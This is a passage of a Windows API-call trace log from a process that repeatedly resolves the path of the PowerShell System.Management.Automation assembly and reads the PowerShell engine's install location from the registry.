lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.073] GetLastError () returned 0xcb [0055.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.073] GetLastError () returned 0xcb [0055.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce64c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.073] GetLastError () returned 0xcb [0055.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.073] GetLastError () returned 0xcb [0055.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.073] GetLastError () returned 0xcb [0055.073] GetCurrentProcessId () returned 0xa2c [0055.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce64c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.073] GetLastError () returned 0xcb [0055.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.073] GetLastError () returned 0xcb [0055.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.074] GetLastError () returned 0xcb [0055.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce638, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.074] GetLastError () returned 0xcb [0055.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.074] GetLastError () returned 0xcb [0055.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.074] GetLastError () returned 0xcb [0055.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce638, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.074] GetLastError () returned 0xcb [0055.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.074] GetLastError () returned 0xcb [0055.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.074] GetLastError () returned 0xcb [0055.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce64c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.075] GetLastError () returned 0xcb [0055.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.075] GetLastError () returned 0xcb [0055.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.075] GetLastError () returned 0xcb [0055.075] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ceb5c | out: phkResult=0x2ceb5c*=0x34c) returned 0x0 [0055.075] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ceba4, lpData=0x0, lpcbData=0x2ceba0*=0x0 | out: lpType=0x2ceba4*=0x1, lpData=0x0, lpcbData=0x2ceba0*=0x56) returned 0x0 [0055.075] RegQueryValueExW (in: hKey=0x34c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ceba4, lpData=0x3b8428, lpcbData=0x2ceba0*=0x56 | out: lpType=0x2ceba4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2ceba0*=0x56) returned 0x0 [0055.076] RegCloseKey (hKey=0x34c) returned 0x0 [0055.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce64c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.076] GetLastError () returned 0xcb [0055.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.076] GetLastError () returned 0xcb [0055.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.076] GetLastError () returned 0xcb [0055.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce634, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.076] GetLastError () returned 0xcb [0055.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.076] GetLastError () returned 0xcb [0055.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.076] GetLastError () returned 0xcb [0055.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.087] GetLastError () returned 0xcb [0055.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.087] GetLastError () returned 0xcb [0055.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.087] GetLastError () returned 0xcb [0055.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.087] GetLastError () returned 0xcb [0055.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.087] GetLastError () returned 0xcb [0055.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.087] GetLastError () returned 0xcb [0055.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.088] GetLastError () returned 0xcb [0055.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.088] GetLastError () returned 0xcb [0055.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.088] GetLastError () returned 0xcb [0055.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.088] GetLastError () returned 0xcb [0055.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.088] GetLastError () returned 0xcb [0055.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.088] GetLastError () returned 0xcb [0055.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.088] GetLastError () returned 0xcb [0055.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.088] GetLastError () returned 0xcb [0055.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.088] GetLastError () returned 0xcb [0055.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.088] GetLastError () returned 0xcb [0055.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.088] GetLastError () returned 0xcb [0055.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.088] GetLastError () returned 0xcb [0055.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.089] GetLastError () returned 0xcb [0055.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.089] GetLastError () returned 0xcb [0055.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.089] GetLastError () returned 0xcb [0055.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.089] GetLastError () returned 0xcb [0055.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.089] GetLastError () returned 0xcb [0055.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.089] GetLastError () returned 0xcb [0055.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.089] GetLastError () returned 0xcb [0055.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.089] GetLastError () returned 0xcb [0055.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.089] GetLastError () returned 0xcb [0055.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.089] GetLastError () returned 0xcb [0055.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.089] GetLastError () returned 0xcb [0055.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.089] GetLastError () returned 0xcb [0055.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.091] GetLastError () returned 0xcb [0055.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.091] GetLastError () returned 0xcb [0055.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.091] GetLastError () returned 0xcb [0055.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.091] GetLastError () returned 0xcb [0055.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.091] GetLastError () returned 0xcb [0055.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.091] GetLastError () returned 0xcb [0055.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0055.091] GetLastError () returned 0xcb [0055.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2cdc70, lpFilePart=0x0 | out: 